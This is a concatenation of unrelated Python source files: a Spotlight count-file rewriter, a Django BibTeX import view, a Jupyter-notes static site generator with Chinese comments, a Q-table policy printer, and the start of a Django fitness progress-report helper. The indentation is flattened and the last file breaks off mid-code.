if dc > 0:
tsvw.writerow(clean_row([sf, dc, -1]))
# Rewrite all raw data files
def rewrite_all(base_path):
uri_counts(os.path.join(base_path, "uriCounts"))
token_counts(os.path.join(base_path, "tokenCounts"))
count_deltas = pair_counts(os.path.join(base_path, "pairCounts"))
sf_and_total_counts(
os.path.join(base_path, "sfAndTotalCounts"), count_deltas, add_lowercase=False
)
return count_deltas
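# Hedged usage sketch (the path is an assumption): point rewrite_all at the folder
# holding the raw Spotlight count files, e.g.
#     deltas = rewrite_all("/data/spotlight/raw")
# Modified copies of uriCounts, tokenCounts, pairCounts and sfAndTotalCounts are
# then written by rewrite_tsv to a sibling "raw_modified" directory.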
|
__license__ = 'MIT License <http://www.opensource.org/licenses/mit-license.php>'
__author__ = 'Lucas Theis <lucas@theis.io>'
__docformat__ = 'epytext'
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.contrib.admin.views.decorators import staff_member_required
from django.contrib import messages
from django.http import HttpResponseRedirect
from publications.bibtex import import_bibtex_data, parse
from publications.models import Publication, Type
def import_bibtex(request):
if request.method == 'POST':
if not request.POST['bibliography']:
errors = {'bibliography' : 'This field is required.'}
else:
# try to parse BibTex
bib = parse(request.POST['bibliography'])
response = import_bibtex_data(bib)
errors = response['errors']
if errors:
# some error occurred
return render_to_response(
'admin/publications/import_bibtex.html', {
'errors': errors,
'title': 'Import BibTex',
'types': Type.objects.all(),
'request': request},
RequestContext(request))
else:
# show message
messages.info(request, response['msg'])
# redirect to publication listing
return HttpResponseRedirect('../')
else:
return render_to_response(
'admin/publications/import_bibtex.html', {
'title': 'Import BibTex',
'types': Type.objects.all(),
'request': request},
RequestContext(request))
import_bibtex = staff_member_required(import_bibtex)
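# Hedged wiring sketch (URL pattern and placement are assumptions, not from the
# source): the view is typically exposed from the project's URLconf along the
# lines of
#     url(r'^admin/publications/import_bibtex/$', import_bibtex),
# so the staff-only form posts back to itself and redirects to '../' on success.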
|
#!/usr/bin/env python3
# -*- encoding: utf8 -*-
server_version = "0.2.3"
server_log = """
0.0.3 2018-06-11 使用model提供的类方法而不是对象属性重构了项目,使用API解耦合。
添加了Pickle存储对象,方便进行调试。
对于从源HTML中获取Chapter的信息,提供了一个类方法,现在只需要一句话就可以完全自动构建Course对象,
其中自动化Course的信息、包含章节的信息以及每个章节相关笔记的信息。
0.0.4 2018-06-11 完善related_notes笔记接口,提供三种标准(问题、名言、博客类型),整个程序大体完成。
0.1.0 Alpha 上线测试
0.1.1 2018年6月18日 添加了 ‘explain’ 类型的笔记。给每个笔记添加了链接。解决了目录显示顺序随机的问题。
0.2.0 2018年7月14日 修正了一些错误,优化了转换ipynb文件的逻辑,提高了健壮性,现在复制文件会根据时间来计算,避免了全局复制,减小更新负担。
转化文件按照文件夹顺序,加快了程序运行。降低了配置文件复杂程度,现在不需要声明允许的文件夹信息。
0.2.2 2018年7月14日 服务器上线,修正了一些日志的逻辑问题,添加了注释,不再保存数据到last_data中。
0.2.3 2018年7月15日 修复convert模块中一个导致日期判断出错的bug。
"""
from muninn_config import *
import random,os,re,pickle
from model import *
import convert,traceback
STOP = False
def constructWorld(courses,head=None,notes=None):
"""构建OO对象,仅初始化课程及其包含的章节,不包括章节具体标题、描述和相关笔记。"""
clist = []
#head包含了章节顺序信息,其也是courses字典的key值
#从config.py中配置Course信息,包括Course信息,其包含的Chapter信息(构建Chapter对象)
# 以及对应地址包含的Chapter标题、描述和相关Note对象信息
try:
for key in head:
c = Course().set_config(courses[key])
clist.append(c)
except:
print("\n"+"X"*20,"\n课程添加出错,可能是索引不正确..\n","X"*20+"\n")
print(traceback.format_exc())
try:
convert.transData(clist,from_source=JUPYTER_NOTEBOOK_ROOT_FOLDER,
to_source=HTML_DST_FOLDER+SEP)
needfiles = convert.findIpynb(clist,from_source=JUPYTER_NOTEBOOK_ROOT_FOLDER,
to_source=HTML_DST_FOLDER+SEP)
if len(needfiles) == 0:
STOP = True
return []
convert.convertNotes(clist,"source",needfiles=needfiles)
except:
print("\n"+"X"*20,"在转换文件时出错","X"*20+"\n")
print(traceback.format_exc())
try:
for course in clist:
course.set_chapter(chapter_address="source",get_header=True,get_description=True,get_notes=True,reload_info=True)
except:
print("\n"+"X"*20,"在写入章节信息时出错","X"*20+"\n")
print(traceback.format_exc())
return clist
def main(update_data=False,file_path=""):
    # first call the OO construction function to build the course collection
print("="*20,"开始处理数据","="*20)
if update_data:
print("正在构建项目")
clist = constructWorld(COURSE_INFO,COURSE_HEAD)
#p = pickle.dump(clist,open(file_path,"wb"))
#print("项目构建完毕,并且存放在:%s"%file_path)
else:
print("从备份中读取项目")
clist = pickle.load(open(file_path,"rb"))
if STOP or len(clist) == 0:
print("没有更新内容,本次更新已跳过.")
return 0
    # first build an HTML navigation menu from all courses; its links point to the html files created below
menu_html = makeHead(clist)
    # generate the index page
index_html = make_Index(menu_html)
writeToFile(index=True,html=index_html)
    # then generate a separate page for each course, named after the course
for c in clist:
overview = makeHTMLPage(c,menu_html)
print("\t生成HTML::课程总览",c)
writeToFile(c,overview)
for ch in c.chapters:
print("\t\t生成HTML::章节信息",ch)
ch_html = makeHTMLPage(c,menu_html,is_chapter=True,chapter_id=ch.id)
writeToFile(c,ch_html,suffix="_ch_%s.html"%ch.id)
print("\n"+"="*20,"FINISHED","="*20+"\n")
def makeHead(clist):
"""根据所有的课程信息返回一个HTML语言的导航条"""
out_html = ""
dropdown_html = ""
finished_2st = []
for c in clist:
if not c.have_father():
out_html += """ <li class="nav-item">
<a class="nav-link" href="%s">%s</a>
</li>
"""%("/"+c.get_uri(full_path=True,suffix="_overview.html"),c.get_name())
#print("here :",c.get_uri(full_path=True,suffix="_overview.html"))
else:
rand_a = random.randint(1000,9999)
sub_html = ""
for cs in clist:
if (cs.get_name(fname=True) in finished_2st) or (not cs.have_father()) or\
(cs.get_name(fname=True) != c.get_name(fname=True)):
continue
else:
if not cs.get_type():
_type = ""
else: _type = cs.get_type()
sub_html += """
<a class="dropdown-item" href="%s">%s <small>%s</small></a>
"""%("/"+cs.get_uri(full_path=True,suffix="_overview.html"),cs.get_name(),_type)
if not c.get_name(fname=True) in finished_2st:
dropdown_now_html = """
<li class="nav-item dropdown">
<a class="nav-link dropdown-toggle" href="#" id="%s" data-toggle="dropdown">%s</a>
<div class="dropdown-menu" aria-labelledby="%s">%s</div>
</li>"""%(rand_a,c.get_name(fname=True),rand_a,sub_html)
out_html += dropdown_now_html
finished_2st.append(c.get_name(fname=True))
menu_html = """
<nav class="navbar navbar-expand navbar-dark bg-dark">
<a class="navbar-brand" href="/">MUNINN <small>by Corkine Ma</small></a>
<div class="navbar-collapse collapse justify-content-between">
<ul class="navbar-nav">
%s
</ul>
</div>
<div class="collapse navbar-collapse justify-content-end"></div>
</nav>
"""%out_html
return menu_html
def makeHTMLPage(course_info,menu_html,is_chapter=False,chapter_id="",chapter_address="source"):
"""对于课程总览,在此返回HTML页面。对于每个章节,也在此返回HTML页面。"""
c = course_info
chapter_html = ""
notes_html = ""
html_now = ""
intro_content = "尚未添加内容"
detail_map = {
"h1_title":"",
"h2_html":"",
}
chapter_update = "2018-01-01"
chapter_url = "#"
for ch in c.chapters:
        # when rendering a chapter page, find the current chapter and handle it as follows:
if is_chapter and ch.id == chapter_id:
            # title at the top of the left-hand column
chapter_html += """<a href="%s" class="list-group-item list-group-item-action d-flex justify-content-between align-items-center active">
%s<span class="badge badge-primary badge-pill">%s</span></a>"""%(c.get_uri(is_chapter=True,chapter=ch.id),ch.name,ch.mark)
            # chapter contents in the lower part of the left-hand column
current_h1 = ""
html_now = """ <ul class="list-group">
<li class="list-group-item list-group-item-light">章节目录</li>"""
if ch.get_header():
for head in ch.get_header():
if not current_h1: current_h1 = head
if head.startswith("<h1>") and current_h1 != head:
html_now += """</ul>
</li>"""
current_h1 = head
if head.startswith("<h1>"):
html_now += """
<li class="list-group-item">
%s
<ul class="list-group list-group-flush">"""%head.replace("<h1>","")
if head.startswith("<h2>"):
html_now += """<li class="list-group-item">%s</li>"""%head.replace("<h2>","")
html_now += """</ul></li>"""
            # look for the <intro> tag and return the chapter overview shown at the top of the right-hand column
intro_content = ch.get_description()
            # return the note information shown at the bottom right
notes = ch.get_related_notes()
# print("get notes",notes)
notes_html = ""
blog_mold = """
<div class="card">
<div class="card-body">
<h5 class="card-title">
<a class="card-link" href="{note_url}">{note_title}</a> </h5>
<p class="card-text">{note_description}</p>
<small class="card-text text-muted">{note_date}</small>
</div>
</div>"""
quote_mold = """
<div class="card text-right p-3">
<blockquote class="blockquote mb-0">
<p>{note_title}</p>
<footer class="blockquote-footer">
<small class="text-muted">{note_footer}</small>
</footer>
</blockquote>
</div>"""
question_mold = """
<div class="card border-danger">
<div class="card-body">
<p class="card-text">{note_title}</p>
<span class="card-text"><small>{note_date}</small></span>
</div>
</div>"""
explain_mold = """
<div class="card">
<div class="card-body">
<p class="card-text">{note_title}</p>
<span class="card-text"><small>{note_date}</small></span>
</div>
</div>"""
for note in notes:
note_map = {
"note_url":note.sourceuri,
"note_title":note.name,
"note_description":note.description,
"note_date":note.modified_date,
"note_footer":note.footer,
}
if note.mold == "blog":
notehtml = blog_mold.format_map(note_map)
elif note.mold == "quote":
notehtml = quote_mold.format_map(note_map)
elif note.mold == "question":
notehtml = question_mold.format_map(note_map)
elif note.mold == "explain":
notehtml = explain_mold.format_map(note_map)
notes_html += notehtml
chapter_update = ch.get_update()
chapter_url = "/" + ch.get_url(real=True)
else:
            # overview page, not an individual chapter
chapter_html += """<a href="%s" class="list-group-item list-group-item-action d-flex justify-content-between align-items-center">
%s<span class="badge badge-primary badge-pill">%s</span></a>
"""%(c.get_uri(is_chapter=True,chapter=ch.get_id()),\
ch.get_name(),ch.get_version(only_mark=True))
isc = isc2 = overview_href = ""
if is_chapter:
isc = ""
isc2 = "active"
overview_href = c.get_uri(only_name=True,suffix="_overview.html")
else:
isc = "active"
isc2 = "disabled"
overview_href = "#"
map_c = {
"title": c.get_name(),
"nb_href":"#",
"single_chapter":chapter_html,
"overview":isc,
"notebook":isc2,
"overview_href":overview_href,
"html_now":html_now,
"intro_content":intro_content,
"notes_html":notes_html,
"page_name":c.get_name(),
"chapter_update":chapter_update,
"chapter_url":chapter_url,
}
head_nav = """
<nav class="nav nav-tabs bg-light">
<li class="nav-item">
<small><a class="nav-link">{title}</a></small>
</li>
<li class="nav-item">
<small><a class="nav-link {overview}" href="{overview_href}">Overview</a></small>
</li>
<li class="nav-item">
<small><a class="nav-link" href="#">Course Info</a></small>
</li>
<li class="nav-item">
<small><a class="nav-link {notebook}" href="{nb_href}">Notebook</a></small>
</li>
</nav>""".format_map(map_c)
    # the row and container divs are left open here (closed in intro_html below)
left_nav = """
<div class="container mt-5 ml-auto">
<div class="row">
<!--左侧-->
<div class="col-md-4">
<!--章节名称-->
<div class="list-group list-group-flush">
{single_chapter}
</div>
<!--章节详细信息-->
<div class="card mt-4">
{html_now}
</div>
</div>
""".format_map(map_c)
header = """<!DOCTYPE html>
<html lang="zh_cn">
<head>
<meta charset="UTF-8">
<title>{page_name} - 课程和笔记</title>
<link rel="stylesheet" href="/css/bootstrap.css">
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</head>
<body>""".format_map(map_c)
footer = """
<footer class="mt-5 pt-5 pl-5 text-muted text-center text-small">
<ul class="list-inline">
<li class="list-inline-item">© 2017-2018 Marvin Studio</li>
<li class="list-inline-item"><a href="#">About Project Muninn</a></li>
</ul>
</footer>
</body>
</html>"""
    # the container and row divs are closed here
intro_html = """<!--右侧-->
<div class="col-md-8 pl-3">
<!--本章概览-->
<div class="card">
<div class="card-header">本章概览</div>
<div class="card-body">
{intro_content}
<p class="card-text">
<small class="text-muted">最后更新于 {chapter_update} <a href="{chapter_url}" target="_black" class="card-link">查看笔记</a></small>
</p>
</div>
</div>
<!--笔记详情-->
<div class="card-columns mt-5">
{notes_html}
</div>
</div>
</div>
</div>""".format_map(map_c)
output_html = header + menu_html + head_nav + left_nav + intro_html + footer
return output_html
def make_Index(html_head):
index_map = {
"html_head":html_head,
"server_version":(server_version if server_version else "Beta"),
}
output_html = """
<!DOCTYPE html>
<html lang="cn">
<head>
<meta charset="UTF-8">
<title>Welcome to Muninn!</title>
<link rel="stylesheet" href="css/bootstrap.css">
</head>
<body>
{html_head}
<div class="container">
<div class="row pt-5">
<div class="col-md-7">
<div class="jumbotron jumbotron-fluid p-5 m-0">
<h1 class="display-4">Hello, Corkine</h1>
<!--<p class="lead">Muninn是一个存放在Github等静态网站托管服务商上的笔记系统,-->
<!--此系统被设计用来整合不同领域的知识。本站点包含了奖励系统、课程系统和笔记系统。-->
<!--你可以使用动态脚本生成站点。</p>-->
<!--<hr class="my-2">-->
<!--<p class="text-muted">本网站是Jupyter Notebook的展示模块,一个动态脚本用来遍历所有文件夹的课程章节的iPynb文件,-->
<!--并且生成html文本,从此脚本中检索标题、更新日期、相关笔记,然后套用一个精致的排版展示出来。-->
<!--</p>-->
<!--<p class="mt-4 lead">-->
<!--<a class="btn btn-lg btn-primary" href="#" role="button">了解更多</a>-->
<!--</p>-->
<p class="mt-3 lead">本周您更新了 1 章节,记录了 3 篇笔记,继续保持!</p>
<hr class="my-2">
<p class="mt-3">自从上次更新,你获得了 <span class="badge badge-secondary">文思泉涌</span> 勋章。</p>
<p class="mt-3 text-muted">最后更新于:2018年6月13日</p>
</div>
<h1 class="lead mt-3 pb-0 pl-1 pt-4">博客聚焦
<br><span class="small text-muted font-weight-light">所有的博客均发布于 blog.mazhangjing.com</span> </h1>
<div class="card mt-3">
<div class="card-body">
<h5 class="card-title lead">Python数据处理学习笔记 - seaborn统计数据可视化篇</h5>
<p class="card-text small text-muted">Seaborn是基于Python的一个统计绘图工具包。Seaborn提供了一组高层次封装的matplotlib API接口。使用Seaborn而不是matplotlib,
绘图只需要少数几行代码,并且可以更加容易控制Style、Palette。本文基本是按照官方Guide顺序写就的。</p>
<a href="#" class="card-link">查看全文</a>
</div>
</div>
<div class="card mt-3">
<div class="card-body">
<h5 class="card-title lead">编程范式——《像计算机科学家一样思考》读书笔记(下)</h5>
<p class="card-text small text-muted">这是我关于《如何像计算机科学家一样思考》一书的体会和总结。此书的副标题叫做《Think Python》,
作者是Allen.B.Downey,欧林计算机学院计算机科学教授,MIT计算机科学学士和硕士,UCB计算机科学博士。
作者本身写作此书的原因是用来讲解的语言是java入门知识,其目标是:简短、循序渐进、专注于编程而非语言。这本书里出现的编程知识基本上是所有语言所共用的,
因此用来做一个程序学习之架构是非常合适,这也是本文希望做的——在这本书的基础上建立一个学习所有编程语言的基本框架。</p>
<a href="#" class="card-link">查看全文</a>
</div>
</div>
<div class="card mt-3">
<div class="card-body">
<h5 class="card-title lead">使用Python和Slack实现字幕组美剧的更新和通知</h5>
<p class="card-text small text-muted">本文介绍了使用Python和Slack实现字幕组美剧更新推送的一种方法,
脚本可以部署在Windows或者GNU/Linux或者macOS平台,使用计划任务或者CRON进行定时执行。你需要一个Slack的Webhook地址,
用于将消息POST到你的APP – Web、Android、iOS、watchOS以及PC、macOS均支持的Slack应用程序。</p>
<a href="#" class="card-link">查看全文</a>
</div>
</div>
<div class="card mt-3">
<div class="card-body">
<h5 class="card-title lead">图书馆七楼的落地窗 - 2017 于桂子山下</h5>
<p class="card-text small text-muted">写在华中师大,2017年底某个上弦月(半月),在地球上,武汉循进阳光的黑暗时(大约下午五点三十九分)。
此文另有姊妹篇,一年前于华中农业大学图书馆,见此: 图书馆五楼的落地窗 - 2016 于狮子山下</p>
<a href="#" class="card-link">查看全文</a>
</div>
</div>
</div>
<div class="col-md-5 pl-5">
<div class="card pb-3">
<!--<div class="card-header">勋章墙</div>-->
<p class="card-title lead mt-4 ml-4">勋章墙 <span class="badge badge-light">06/13 - 06/20</span></p>
<div class="row">
<div class="col-md-4">
<div class="pl-3 pt-3">
<img class="rounded mx-auto d-block" src="src/idea_596.1401384083px_1209661_easyicon.net.png" height="70" width="70" />
<h6 class="lead text-center pt-3">点子多多</h6>
</div>
</div>
<div class="col-md-4">
<div class="p-0 m-0 pt-3">
<img class="rounded mx-auto d-block" src="src/diary_638px_1209882_easyicon.net.png" height="70" width="70"/>
<h5 class="card-title lead text-center pt-3">文思泉涌</h5>
</div>
</div>
<div class="col-md-4">
<div class="pr-3 pt-3">
<img class="rounded mx-auto d-block" src="src/studying_669.79180887372px_1205971_easyicon.net.png" height="70" width="70"/>
<h5 class="card-title lead text-center pt-3">挑灯夜战</h5>
</div>
</div>
<div class="col-md-4">
<div class="pl-3 pt-3">
<img class="rounded mx-auto d-block" src="src/Book_2000px_1170680_easyicon.net.png" height="70" width="70" />
<h5 class="lead text-center pt-3">日积月累</h5>
</div>
</div>
<div class="col-md-4">
<div class="p-0 m-0 pt-3">
<img class="rounded mx-auto d-block" src="src/quote_128px_1088353_easyicon.net.png" height="70" width="70"/>
<h5 class="card-title lead text-center pt-3">引经据典</h5>
</div>
</div>
<div class="col-md-4">
<div class="pr-3 pt-3">
<img class="rounded mx-auto d-block" src="src/sun_783px_1209087_easyicon.net.png" height="70" width="70"/>
<h5 class="card-title lead text-center pt-3">一天之计</h5>
</div>
</div>
<div class="col-md-4">
<div class="pl-3 pt-3">
<img class="rounded mx-auto d-block" src="src/classroom_645.00155520995px_1210165_easyicon.net.png" height="70" width="70" />
<h6 class="lead text-center pt-3">课程达人</h6>
</div>
</div>
<div class="col-md-4">
<div class="p-0 m-0 pt-3">
<img class="rounded mx-auto d-block" src="src/plant_639px_1210114_easyicon.net.png" height="70" width="70"/>
<h5 class="card-title lead text-center pt-3">新的希望</h5>
</div>
</div>
<div class="col-md-4">
<div class="pr-3 pt-3">
<img class="rounded mx-auto d-block" src="src/bee_704px_1210071_easyicon.net.png" height="70" width="70"/>
<h5 class="card-title lead text-center pt-3">乐此不疲</h5>
</div>
</div>
<div class="col-md-4">
<div class="pl-3 pt-3">
<img class="rounded mx-auto d-block" src="src/cup_1088.8906649616px_1205872_easyicon.net.png" height="70" width="70" />
<h5 class="lead text-center pt-3">完美一周</h5>
</div>
</div>
<div class="col-md-4">
<div class="p-0 pt-3">
<img class="rounded mx-auto d-block" src="src/aias_562.56010230179px_1205860_easyicon.net.png" height="70" width="70"/>
<h5 class="card-title lead text-center pt-3">探索发现</h5>
</div>
</div>
<div class="col-md-4">
<div class="pr-3 pt-3">
<img class="rounded mx-auto d-block" src="src/nobel_1564px_1205896_easyicon.net.png" height="70" width="70"/>
<h5 class="card-title lead text-center pt-3">诺贝尔奖</h5>
</div>
</div>
</div>
</div>
<div class="pt-3 pl-1 text-muted small">
<p>我的 Jupyter 笔记系统 · 我的 Github 笔记展示仓库
<br>笔记博客系统部署指南 · Github 代码仓库
<br>Design & Developed by Corkine Ma (Github@corkine)
<br>Server Version: {server_version}
<br>© Marvin Studio 2018 </p>
</div>
</div>
</div>
<footer class="mt-5 pt-5 pl-5 text-muted text-center text-small">
<ul class="list-inline">
<li class="list-inline-item"></li>
<li class="list-inline-item"></li>
</ul>
</footer>
<!--
<footer class="mt-5 pt-5 pl-5 text-muted text-center text-small">
<ul class="list-inline">
<li class="list-inline-item">© 2018 Marvin Studio</li>
<li class="list-inline-item"><a href="#">About Project Muninn</a></li>
<li class="list-inline-item"><a href="#">Jupyter Notebook</a></li>
<li class="list-inline-item"><a href="#">Github@Corkine</a></li>
</ul>
</footer>-->
</body>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</html>
""".format_map(index_map)
return output_html
def writeToFile(c=None,html="",suffix="_overview.html",index=False):
if index:
f = open("index.html","w+",encoding="utf8")
f.write(html)
f.close()
else:
fname_uri = c.get_uri(only_fname=True)
        if not os.path.isdir(fname_uri):
            os.mkdir(fname_uri)
f = open(c.get_uri(full_path=True,suffix=suffix),"w+",encoding="utf8")
f.write(html)
f.close()
if __name__ == "__main__":
main(update_data=True,file_path="muninn_test_last.data")
|
import numpy as np
def print_policy(q_table, SIZE):
# left, down, right, up
actions = [ ' ⬅ ', ' ⬇ ', ' ➡ ', ' ⬆ ' ]
for i, r in enumerate(q_table):
if 0 == (i % SIZE):
print()
max_action = np.argmax(r)
print(actions[max_action], end='')
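# Minimal usage sketch (values are made up): render a greedy policy for a 4x4
# grid world from a random Q-table with one row per state and one column per
# action (left, down, right, up).
if __name__ == "__main__":
    np.random.seed(0)
    demo_q_table = np.random.rand(16, 4)
    print_policy(demo_q_table, 4)
    print()  # trailing newline, since print_policy prints with end=''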
|
from datetime import datetime, timedelta
from itertools import zip_longest
from decimal import Decimal, ROUND_HALF_UP
import copy
import json
from django.db.models import Q
from .cumulative_helper import _get_datewise_aa_data
from quicklook.calculations import garmin_calculation
from quicklook.models import UserQuickLook
from user_input.models import UserDailyInput
from progress_analyzer.models import CumulativeSum,\
OverallHealthGradeCumulative, \
NonExerciseStepsCumulative, \
SleepPerNightCumulative, \
MovementConsistencyCumulative, \
ExerciseConsistencyCumulative, \
NutritionCumulative, \
ExerciseStatsCumulative, \
AlcoholCumulative,\
SickCumulative,\
StandingCumulative,\
TravelCumulative,\
StressCumulative,\
OtherStatsCumulative,\
MetaCumulative
from progress_analyzer.helpers.cumulative_helper import\
create_cum_raw_data,\
_get_model_not_related_concrete_fields
class ToOverallHealthGradeCumulative(object):
def __init__(self,raw_data):
fields = _get_model_not_related_concrete_fields(OverallHealthGradeCumulative)
for field in fields:
setattr(self, field, raw_data[field])
class ToNonExerciseStepsCumulative(object):
def __init__(self,raw_data):
fields = _get_model_not_related_concrete_fields(NonExerciseStepsCumulative)
for field in fields:
setattr(self, field, raw_data[field])
class ToSleepPerNightCumulative(object):
def __init__(self,raw_data):
fields = _get_model_not_related_concrete_fields(SleepPerNightCumulative)
for field in fields:
setattr(self, field, raw_data[field])
class ToMovementConsistencyCumulative(object):
def __init__(self,raw_data):
fields = _get_model_not_related_concrete_fields(MovementConsistencyCumulative)
for field in fields:
setattr(self, field, raw_data[field])
class ToExerciseConsistencyCumulative(object):
def __init__(self,raw_data):
fields = _get_model_not_related_concrete_fields(ExerciseConsistencyCumulative)
for field in fields:
setattr(self, field, raw_data[field])
class ToNutritionCumulative(object):
def __init__(self,raw_data):
fields = _get_model_not_related_concrete_fields(NutritionCumulative)
for field in fields:
setattr(self, field, raw_data[field])
class ToExerciseStatsCumulative(object):
def __init__(self,raw_data):
fields = _get_model_not_related_concrete_fields(ExerciseStatsCumulative)
for field in fields:
setattr(self, field, raw_data[field])
class ToAlcoholCumulative(object):
def __init__(self,raw_data):
fields = _get_model_not_related_concrete_fields(AlcoholCumulative)
for field in fields:
setattr(self, field, raw_data[field])
class ToSickCumulative(object):
def __init__(self,raw_data):
fields = _get_model_not_related_concrete_fields(SickCumulative)
for field in fields:
setattr(self, field, raw_data[field])
class ToStressCumulative(object):
def __init__(self,raw_data):
fields = _get_model_not_related_concrete_fields(StressCumulative)
for field in fields:
setattr(self, field, raw_data[field])
class ToTravelCumulative(object):
def __init__(self,raw_data):
fields = _get_model_not_related_concrete_fields(TravelCumulative)
for field in fields:
setattr(self, field, raw_data[field])
class ToStandingCumulative(object):
def __init__(self,raw_data):
fields = _get_model_not_related_concrete_fields(StandingCumulative)
for field in fields:
setattr(self, field, raw_data[field])
class ToOtherStatsCumulative(object):
def __init__(self,raw_data):
fields = _get_model_not_related_concrete_fields(OtherStatsCumulative)
for field in fields:
setattr(self, field, raw_data[field])
class ToMetaCumulative(object):
def __init__(self,raw_data):
fields = _get_model_not_related_concrete_fields(MetaCumulative)
for field in fields:
setattr(self, field, raw_data[field])
class ToCumulativeSum(object):
'''
	Creates a fake object which behaves like a CumulativeSum object.
	It is mainly used to build a fake current-day CumulativeSum record
	that fits the current PA architecture without special handling.
	We do not generate a CumulativeSum record for the current day until
	the next day, because the current day's data keeps changing as users
	sync their devices. To avoid multiple database writes we defer the
	write until the next day and create the PA reports for the previous
	day in batch.
	To compensate for the current day's missing CumulativeSum we create
	a fake object that behaves like a normal CumulativeSum object and
	works with the existing PA code without any special handling.
'''
def __exclude_no_data_yet_hours(self, ql_obj):
'''
		If there is any "No Data Yet" hour in the movement consistency data,
		set it to 0, because it should not be taken into account when
		calculating "inactive hours" for the current day
'''
mcs = ql_obj.steps_ql.movement_consistency
if mcs:
mcs = json.loads(mcs)
if mcs.get('no_data_hours'):
mcs['no_data_hours'] = 0
ql_obj.steps_ql.movement_consistency = json.dumps(mcs)
return ql_obj
def __init__(self,user,ql_obj,ui_obj,aa_obj,cum_obj=None):
'''
user(:obj:`User`)
ql_obj(:obj:`UserQuickLook`)
ui_obj(:obj:`UserDailyInput`)
aa_obj(dict): Contains Aerobic/Anaerobic data
cum_obj(:obj:`CumulativeSum`,optional)
'''
if ql_obj:
ql_obj = copy.deepcopy(ql_obj)
ql_obj = self.__exclude_no_data_yet_hours(ql_obj)
cum_raw_data = create_cum_raw_data(user,ql_obj,ui_obj,aa_obj,cum_obj)
self.overall_health_grade_cum = ToOverallHealthGradeCumulative(
cum_raw_data["overall_health_grade_cum"]
)
self.non_exercise_steps_cum = ToNonExerciseStepsCumulative(
cum_raw_data["non_exercise_steps_cum"]
)
self.sleep_per_night_cum = ToSleepPerNightCumulative(
cum_raw_data["sleep_per_night_cum"]
)
self.movement_consistency_cum = ToMovementConsistencyCumulative(
cum_raw_data["movement_consistency_cum"]
)
self.exercise_consistency_cum = ToExerciseConsistencyCumulative(
cum_raw_data["exercise_consistency_cum"]
)
self.nutrition_cum = ToNutritionCumulative(
cum_raw_data["nutrition_cum"]
)
self.exercise_stats_cum = ToExerciseStatsCumulative(
cum_raw_data["exercise_stats_cum"]
)
self.alcohol_cum = ToAlcoholCumulative(
cum_raw_data["alcohol_cum"]
)
self.other_stats_cum = ToOtherStatsCumulative(
cum_raw_data["other_stats_cum"]
)
self.sick_cum = ToSickCumulative(
cum_raw_data["sick_cum"]
)
self.stress_cum = ToStressCumulative(
cum_raw_data["stress_cum"]
)
self.travel_cum = ToTravelCumulative(
cum_raw_data["travel_cum"]
)
self.standing_cum = ToStandingCumulative(
cum_raw_data["standing_cum"]
)
self.meta_cum = ToMetaCumulative(
cum_raw_data["meta_cum"]
)
class ProgressReport():
'''Generate Progress Analyzer Reports on the fly'''
def grouped(self,iterable,n,fillvalue):
'''
		Return grouped data for any iterable
		"s -> (s0,s1,s2,...sn-1), (sn,sn+1,sn+2,...s2n-1), (s2n,s2n+1,s2n+2,...s3n-1), ..."
		Arguments
		- n: type int, number of items in each group
		- fillvalue: type obj, if the iterable is of uneven length, missing values
		are filled in with fillvalue
		example -
		>>> l = [1,2,3,4,5,6,7]
		>>> list(grouped(l,2,None))
		[(1, 2), (3, 4), (5, 6), (7, None)]
'''
a = iter(iterable)
return zip_longest(*[a]*n, fillvalue=fillvalue)
def __init__(self,user, query_params):
self.user = user
# Possible PA summary types
self.summary_type = ['overall_health','non_exercise','sleep','mc','ec',
'nutrition','exercise','alcohol','sick','stress','travel','standing','other']
# Possible fixed duration types for PA report
self.duration_type = ['today','yesterday','week','month','year']
self.current_date = self._str_to_dt(query_params.get('date',None))
# Custom date range(s) for which report is to be created
# expected format of the date is 'YYYY-MM-DD'
self.custom_ranges = query_params.get('custom_ranges',None)
year_denominator = 365
if self.current_date:
# Year starts from the day user have Cumulative sums
# for example if user have Cumulative sum record from
# Jan 20, 2019 then year start date would be this and
# number of days will be counted from here on.
self.year_start = self._get_first_from_year_start_date()
yesterday = self.current_date - timedelta(days=1)
if not self.year_start == yesterday:
year_denominator = (yesterday - self.year_start).days + 1
else:
year_denominator = 0
self.duration_denominator = {
'today':1,'yesterday':1, 'week':7, "month":30, "year":year_denominator
}
if self.current_date:
self.cumulative_datewise_data = {q.created_at.strftime("%Y-%m-%d"):q
for q in self._get_cum_queryset()}
self.ql_datewise_data = {q.created_at.strftime("%Y-%m-%d"):q
for q in self._get_ql_queryset()}
self.ui_datewise_data = {q.created_at.strftime("%Y-%m-%d"):q
for q in self._get_ui_queryset()}
self.aa_datewise_data = _get_datewise_aa_data(user,
self.current_date,
self.current_date)
self.custom_daterange = False
if self.custom_ranges:
# it'll be list of tuples, where first item of tuple is the start of range
# and second is end of the range. For example -
# [("2018-02-12","2018-02-17"), ("2018-02-01, 2018-02-29"), ...]
